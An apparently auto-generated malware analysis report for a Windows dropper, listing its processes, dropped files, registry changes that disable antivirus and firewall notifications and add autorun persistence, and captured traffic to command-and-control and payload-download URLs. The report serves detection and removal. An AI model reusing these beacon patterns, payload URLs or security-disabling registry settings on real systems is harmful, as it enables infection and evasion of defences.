Skip to main content

Gen.Variant.Symmi.22722_4840427168


Susp_Dropper (Kaspersky), Gen:Variant.Symmi.22722 (B) (Emsisoft), Gen:Variant.Symmi.22722 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Malware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 4840427168a9965e4dd57695f4eb5f34

SHA1: 0ef4dfd6895938be97f42886e003869bb777c5fd

SHA256: 8645d5705505416572d9393acca274f5d6332a3636621489d2f44ed92b290203

SSDeep: 12288:9qq56aNzthKz69e1NDxNlq99NcMWf8uqlTn8lZQTgqjFsHi0:9dppbKz6WNkLUeJ8lZQT5

Size: 847360 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: PCPerformer

Created at: 2014-04-16 00:27:00

Analyzed on: WindowsXP SP3 32-bit

Summary: Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

win32plot2.exe:1396
jrhwdmjgu925ubg.exe:1776
jrhwdmjgu925ubg.exe:3876
jrhwdmjgunjvubg.exe:2660
%original file name%.exe:1144
unzip.exe:3760
ckxjtyt.exe:1964
ckxjtyt.exe:2836
jrhwdmjgszdmubgkotiny.exe:2128
jrhwdmjgt1byubg.exe:2588
jrhwdmjgubkfubg.exe:3640
pogwoihcz.exe:3524
pogwoihcz.exe:2856

The Malware injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process jrhwdmjgunjvubg.exe:2660 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\tst (10 bytes)

The process %original file name%.exe:1144 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
%System%\bzntcdorshxs\tst (10 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (0 bytes)

The process unzip.exe:3760 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
%System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
%System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
%System%\binaries_burst4\win64\win64plot2.exe (673 bytes)

The process ckxjtyt.exe:1964 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\tst (10 bytes)

The process ckxjtyt.exe:2836 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%System%\binaries_burst4.zip (10700 bytes)
%System%\bzntcdorshxs\run (10 bytes)
%System%\bzntcdorshxs\rng (44 bytes)
%System%\unzip.exe (7100 bytes)
%System%\bzntcdorshxs\cfg (494 bytes)
%System%\pogwoihcz.exe (5873 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
%WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
%WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)

The Malware deletes the following file(s):

%WinDir%\Temp\jrhwdmjgt1byubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (0 bytes)

The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\etc (10 bytes)
%System%\ckxjtyt.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\bzntcdorshxs\tst (10 bytes)

The Malware deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process pogwoihcz.exe:3524 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\tst (10 bytes)

The process pogwoihcz.exe:2856 makes changes in the file system.


The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\tst (10 bytes)

Registry activity

The process win32plot2.exe:1396 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

The process jrhwdmjgu925ubg.exe:1776 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 9C E5 B6 99 02 49 CB AA D2 50 26 B3 C6 6D 3C"

The process jrhwdmjgu925ubg.exe:3876 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 52 33 C4 75 6A 43 E9 D7 74 60 B9 62 2B 23 A5"

The process jrhwdmjgunjvubg.exe:2660 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 B9 84 BF D5 1C C7 54 8E 5E 10 DE 9E 4E 24 BD"

The process unzip.exe:3760 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 E4 47 D5 42 0D 90 00 56 5C 12 74 E1 87 85 4D"

The process ckxjtyt.exe:2836 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 6C AC 11 85 8F BF D5 2A 15 20 D5 32 A8 01 49"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 73 E8 5C DA 03 01 7E 41 DC 1A E3 19 87 2B 55"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe"

The process jrhwdmjgt1byubg.exe:2588 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 8A 05 E4 23 AA 61 68 83 D8 98 CE C4 59 87 C7"

The process jrhwdmjgubkfubg.exe:3640 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

Dropped PE files

MD5 File path
476f447617f65eebf35c52d4fd3b3188c:\WINDOWS\Temp\jrhwdmjgu925ubg.exe
fecf803f7d84d4cfa81277298574d6e6c:\WINDOWS\system32\unzip.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    win32plot2.exe:1396
    jrhwdmjgu925ubg.exe:1776
    jrhwdmjgu925ubg.exe:3876
    jrhwdmjgunjvubg.exe:2660
    %original file name%.exe:1144
    unzip.exe:3760
    ckxjtyt.exe:1964
    ckxjtyt.exe:2836
    jrhwdmjgszdmubgkotiny.exe:2128
    jrhwdmjgt1byubg.exe:2588
    jrhwdmjgubkfubg.exe:3640
    pogwoihcz.exe:3524
    pogwoihcz.exe:2856

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %System%\bzntcdorshxs\tst (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
    %System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
    %System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
    %System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
    %System%\binaries_burst4\win64\win64plot2.exe (673 bytes)
    %System%\binaries_burst4.zip (10700 bytes)
    %System%\bzntcdorshxs\run (10 bytes)
    %System%\bzntcdorshxs\rng (44 bytes)
    %System%\unzip.exe (7100 bytes)
    %System%\bzntcdorshxs\cfg (494 bytes)
    %System%\pogwoihcz.exe (5873 bytes)
    %WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
    %WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
    %WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
    %WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)
    %System%\bzntcdorshxs\etc (10 bytes)
    %System%\ckxjtyt.exe (5873 bytes)
    %System%\drivers\etc\hosts (22 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40966671586676484.714590d37ea21d46fd457efcdcbc414af23e6
.rdata67174453434537603.65008ebfa7ac2aa75c0bd35892129695abd28
.data7290881588441249285.5011916d3baf792c669359cc24b48d18a27cd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://melbourneit.hotkeysparking.com/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01
hxxp://requireneither.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01208.91.197.241
hxxp://decemberknew.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce0198.139.135.198
hxxp://decemberknew.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=098.139.135.198
hxxp://www.geobytes.com/IpLocator.htm69.16.219.22
hxxp://decemberknew.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=098.139.135.198
hxxp://decemberknew.net/forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=098.139.135.198
hxxp://decemberknew.net/dep/unzip.exe98.139.135.198
hxxp://decemberknew.net/dep/binaries_burst4.zip98.139.135.198
hxxp://throughcountry.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01208.91.197.241
hxxp://gentlefriend.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01208.91.197.241
hxxp://picturebecome.net/dep/binaries_burst4.zip98.139.135.198
hxxp://rememberpaint.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01208.91.197.241
hxxp://mightglossary.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce018.5.1.16
hxxp://picturebecome.net/dep/unzip.exe98.139.135.198
hxxp://glasshealth.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01208.91.197.241
www.showmyip.com212.117.175.194

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0

Accept: */*

Connection: close

Host: rememberpaint.net

HTTP/1.1 200 OK

Date: Fri, 06 Mar 2015 17:38:25 GMT

Server: Apache

Vary: Accept-Encoding,User-Agent

Content-Length: 2607

Keep-Alive: timeout=5, max=126

Connection: close

Content-Type: text/html; charset=UTF-8

<!--...top.location="hXXp://rememberpaint.net/?fp=1DRuJgDNJXkEVD5%2FiGni9v3toTy0wy2ebXlOhRNOtS5Udxlo0ID4PfPk5WN9s2E3tmehVOgDmzNCPKCXAdTI%2BQ==&prvtof=0G4hRm1xnmN71Auaziei4xYFwShH7oid2z0uKbb7hLo=&poru=JAEITCvT3ATSD95YCokaigCHAqcD57pq+k9Ssvb0G8WAxKobtn7HH3tsEsDhrrE1c9awH7YyTzET3nczMf6YUm/o067AT7oDEfv6njBn/HKsugTFg7xvoMY3V/nJNwQf&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://rememberpaint.net/?fp=1DRuJgDNJXkEVD5/iGni9v3toTy0wy2ebXlOhRNOtS5Udxlo0ID4PfPk5WN9s2E3tmehVOgDmzNCPKCXAdTI+Q==&prvtof=IT1nchMsaM0WXpFNgClhp0C+LPKdVwt2V3XT7a%2BsH1A=&poru=k4WuWLM/Nm3RxM1tSPdirQmbJGlibMJcKTIY8iBqlXnLr7dZfDXjfNzlDhmJd2PPlSK2W7FCLoHuF8GGSuzFF31sq8y0t92TOXSAtdSLEqfH6J1f4j11GEMW

<<< skipped >>>

GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: decemberknew.net

HTTP/1.0 200 OK

Date: Fri, 06 Mar 2015 17:39:04 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: ATS/5.0.1

.............

GET /forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: decemberknew.net

HTTP/1.0 200 OK

Date: Fri, 06 Mar 2015 17:39:05 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: ATS/5.0.1

.............

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0

Accept: */*

Connection: close

Host: decemberknew.net

HTTP/1.0 200 OK

Date: Fri, 06 Mar 2015 17:39:03 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: ATS/5.0.1

304....U......(.decemberknew.net..........5......o..fFi..8.....b..&.).h.7..i..ng?H..........f..Ht.BH..<M..$.L..l..Z0........W*....... >@..;BY..hs ....f..,..uO@...*.N....J.........\.P.p_..OXP....&.t.Z.w....`..I=!n....W..~W..T.b..!..#._..lD.*...`.K..O......l.....Y...[.%..>/...W..9..?.X...=....B..?..b. .......4...053..............g..p.........!;..#....(.p..K3.;.Z......:-..D...........)......K$xy&.:b:ge......V.ACV.LC...X?&...#..|#)h.v=..6...N..Z.Lvz...,r-.?o.......W.:.h.....X..A..DB8.z. ...r ....(B...S.} ..S..aZ.>.."...V.....d...J.....*p..H /.R].....8<........]}....!.vf,.=...0h..b.o.<.D..{.....-y....N.......Z..I.Cd..K.Q.@..Tr.._-.Nr...}R...d....i...Vb..*..=.......1......n.M.o....?{.(..*.......L.3.../Y.....t...["0.....z....G.Z...I6....o..~..........u.a).k.. #u..,k.j0t..ah.JLsg..h...........}|.N..5`..O.<.(.".;.k.q...b..X..g.0...>...f...Nl.N.jU|.n...f...Js..0{p3..3.%..NlZp..>.*.p(...{I.~.APTnE.!.r4...3 ..]K.Y?....G-...*..K5L....n]...W...p..'&...._.iE[./L..1.b.:.!..*i..C)....L...IJ&k..#O.......p...;...(b..0/...T.lm(9.I....\\\..$_......E....k'...!..B....C..........Bc...{....Q?./OJ.jRd..{....j.`..].W...t...2....../5%......#[.g..WT.M}.9..y...t...GFF.!:.TA.o.*..X.<.`.]...._.....9..,4UQ..-...tA.N*"..P.....l......(N6<~..r...<T[_V(.-..J.M....&v..

<<< skipped >>>

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0

Accept: */*

Connection: close

Host: gentlefriend.net

HTTP/1.1 200 OK

Date: Fri, 06 Mar 2015 17:38:10 GMT

Server: Apache

Vary: Accept-Encoding,User-Agent

Content-Length: 2599

Keep-Alive: timeout=5, max=123

Connection: close

Content-Type: text/html; charset=UTF-8

<!--...top.location="hXXp://gentlefriend.net/?fp=3nB+Gww8ttmsWXm0BY1EdeTmO3Ulz67JmvcOUDVf4eYrovlWueybau49NakK4xLYrEVUQbqJcKdH0CbuvXfg5g==&prvtof=zhRgz1xuFRpHFAgLQv0feYD/DBX/Ng1JO565gWSBtZI=&poru=N8dRHeffnczSYRX4s7t//tDxbrorndTL1Hfxni3GMu9SpXTX7COifFNjVMvoIw4JEkRMkseCQXQwNz+8QJdhKj05mguiYHfqhLUf4gHPRqAn5eRP5v5DJ9GOnHJH/IEo&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://gentlefriend.net/?fp=3nB+Gww8ttmsWXm0BY1EdeTmO3Ulz67JmvcOUDVf4eYrovlWueybau49NakK4xLYrEVUQbqJcKdH0CbuvXfg5g==&prvtof=XtjO2X71dZ5T2BDPJWLoPT7k8Mx5PXGAeq+J3jPNgxU=&poru=h2VspZVYRcX61rDfjpvXg4PszgFGhY31jvEvToI6myr+/qWzpARQ4n%2By1Rdv0gzizQizReBV4w5LK2vhGfE840xM/AjnZx7n5lEVhUfW2/InmjHAedL0

<<< skipped >>>

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0

Accept: */*

Connection: close

Host: requireneither.net

HTTP/1.1 200 OK

Date: Fri, 06 Mar 2015 17:38:10 GMT

Server: Apache

Vary: Accept-Encoding,User-Agent

Content-Length: 2601

Keep-Alive: timeout=5, max=111

Connection: close

Content-Type: text/html; charset=UTF-8

<!--...top.location="hXXp://requireneither.net/?fp=axCPzesR7uBwtTqOnmcl9F6GeD2ZopDbYpEVkJd07DDm0lAUyJuIxlLRzzCEJlVCjx6s55CadqZFeRomVEAErQ==&prvtof=DtovJQCpYRpf99MUWzBwaQI1fo6mS7UMSgVgFRORcFY=&poru=J1gFiuzz+h8I6C8md3nr6FsCHGohqf81OdafFArL0i+6O4BDZQB/pReR4mHRPRCqKx%2F7vBiRKyRlbQQLuJArpae1V3+ZgdHNLZLXnd1iVcCyXACaJj1xabfHGLFvaMdn&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://requireneither.net/?fp=axCPzesR7uBwtTqOnmcl9F6GeD2ZopDbYpEVkJd07DDm0lAUyJuIxlLRzzCEJlVCjx6s55CadqZFeRomVEAErQ==&prvtof=cIgUFdj0K5P8mVSR9AkhcEl2A4Gj/iGY9C53s3q4RCI%3D&poru=xZkbqYo/emU/zwMkcAtPW1mOH0T7Sx4x3sXsGyevMKJglGwvtrb99Xv7WbO3UfbrO8u/YApPSNIVR6oacHv69g+9JRMagR37GsZAjICaculwljRRugrFlsR5

<<< skipped >>>

relayrqst

ID

..

GET /dep/unzip.exe HTTP/1.0

Accept: */*

Connection: close

Host: picturebecome.net

HTTP/1.0 200 OK

Date: Fri, 06 Mar 2015 17:39:05 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 20 May 2014 22:57:37 GMT

Accept-Ranges: bytes

Content-Length: 164864

Content-Type: application/octet-stream

Age: 0

Server: ATS/5.0.1

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......B...............8.Z...................p....@...............3........................... ......................................................................................................................................................text...$X.......Z..................`..`.data........p.......^..............@....bss.....................................idata...............`..............@....rsrc................t..............@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.......$........C..h.....1.]...U.......$........C..H.....1.]...U......U...$..d.C...]..v...'....U......U...$..H.C...]..v...'....U..S..$..$..@..}O.......C....$.pB.....B..M..E......L$..T$..U..T$..D$..pB...K....qB...t^..qB...<.C...t..D$..Z...$..K....<.C....t....qB..\$..J0..$..K....<.C....t....qB..\$..JP..$.{K...fK.....qB.....C...4K.....pB......pB...$.\$..L$..........J....$..N....&....U......]..M.1..u.1.....=..........=....sg=....t....u..]...]....D$.......$......J.....t"..t...$......&......'...........

<<< skipped >>>

GET /dep/binaries_burst4.zip HTTP/1.0

Accept: */*

Connection: close

Host: picturebecome.net

HTTP/1.0 200 OK

Date: Fri, 06 Mar 2015 17:39:06 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Fri, 06 Mar 2015 17:25:24 GMT

Accept-Ranges: bytes

Content-Length: 321783

Content-Type: application/zip

Age: 0

Server: ATS/5.0.1

PK..........fF................binaries_burst4/..1 ...~2...PK..............PK..........fF................binaries_burst4/win64/..1 ...~2...PK..............PK........p.fFTn..JD......$...binaries_burst4/win64/win64plot2.exe..1 ...~2...Z../....?|].ex.z#a.k.}o}.#<\_..2%....(..~.....n`.|b.....M..w..v...;...5......;...f6!..^r.TRTu ...S4..F.#.h!J...z.....@..@.-y.7..)..D..C.}......8..-$..-.wy..{'....Wh.....e~hK....Wu.9odo.G...O......f...e{.....|A....c......Q..6.i*...dJ$.3.o.8....,.....#_.........lg.p..p*h.D-..%9?.Gf...........8...?..=c.l'..1.K...C.V.......B..I{.....aG..55O{.$!..,...........Y~..............X.00Jxc.................z.%.(:M...R.....7......1..v~j.......`,@...wj.....)..J....4..T...%D....z.....w.AP*!.....{....a.NE=.h.....C.......!..wC....R..lQX.L.G....o4......'.t7QYOE.x{..y&..{....?y.....@F.3......Y-.L.MV.-..=.....J}.KHK.lG..(........P ..=.a...>.p!DR..u.. ....GD.E.sY....1..D...d.T.....=.t.."c..P....L..Z.h.k..U..<5.`..D.Rv..w.A{.`?r............ ..&...*U-.....u.Z~...1..U...X. .@M..,...x../^B...^@.QyV.....X.-a.gc..A.Z)P$h.%........S.:.%n.2.]...7T....g..o.s'.^.]O.W..c..17.e...:.........2IH>\Y..j........M<.,\...I.'.S..j\....%.B'x......0...]Go..2/....._m.D...G~...5.....Z ..!,&...<.3}..U?..{1..E%?...@..L>....e<.X....Y=...,."..e~.....Rx.]..[.{..[.*..<.7....J...U.._......`.... .bK..I..Bc.....@k......-.....(.........SF..jv.....q.Q7....3.%.......T......-a..Pwon..y.^..u..'..8.,.....h....n...ylj ..R.=.....|.......U....t.*..K.J0........g...1Z.Q.........R..Mh.'......F......`=.....e.....mn-.2`z.k9'.

<<< skipped >>>

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0

Accept: */*

Connection: close

Host: glasshealth.net

HTTP/1.1 200 OK

Date: Fri, 06 Mar 2015 17:38:11 GMT

Server: Apache

Vary: Accept-Encoding,User-Agent

Content-Length: 2611

Keep-Alive: timeout=5, max=127

Connection: close

Content-Type: text/html; charset=UTF-8

<!--...top.location="hXXp://glasshealth.net/?fp=gflAhs8IcUd97NIiayKQ7UQN9dlG4+w1rhgSgPDY2wI1o/jF3QTSUXEUvYwZaD8eIVaYzJQ4Lnkr85gq8zHv%2Fg==&prvtof=67h3zsyWRM96HzMguVIw2NdqJ+sg0xsg33t5I9z/LVc=&poru=9L/nBj7txLcevEXVP1cCHBo4ptAm7czfS3iC3M3yaXiYxFUyvUodJ4XBJUStdjN4JAxtw9qGwHb1c7suSo4arypf1Xv3S/4Ku9T0pQXvVchj6kR5kdiaxr8TXn5KM2Mx&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://glasshealth.net/?fp=gflAhs8IcUd97NIiayKQ7UQN9dlG4+w1rhgSgPDY2wI1o/jF3QTSUXEUvYwZaD8eIVaYzJQ4Lnkr85gq8zHv/g==&prvtof=n+scX8txUIS8AicO8bYmmTai1kexrb2ax5CYJ+aQ0SU=&poru=ZfmI6g7Ocz4B2/kwYdn7QBUrOzmbBFIsa/tBlE9Umk/T+gLSwOcUOeOU9JeEHoQOHHVqq7emploCdGlO4+Bejn8FmEfbIk4NvkonDzLYANLGP0zR

<<< skipped >>>

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0

Accept: */*

Connection: close

Host: mightglossary.net

HTTP/1.1 200 OK

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 7849

Content-Type: text/html; charset=utf-8

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

p3p: CP="CAO PSA OUR"

Set-Cookie: SessionID=1671ce8f-86e8-4303-a81c-b7e9e64fca1e; path=/

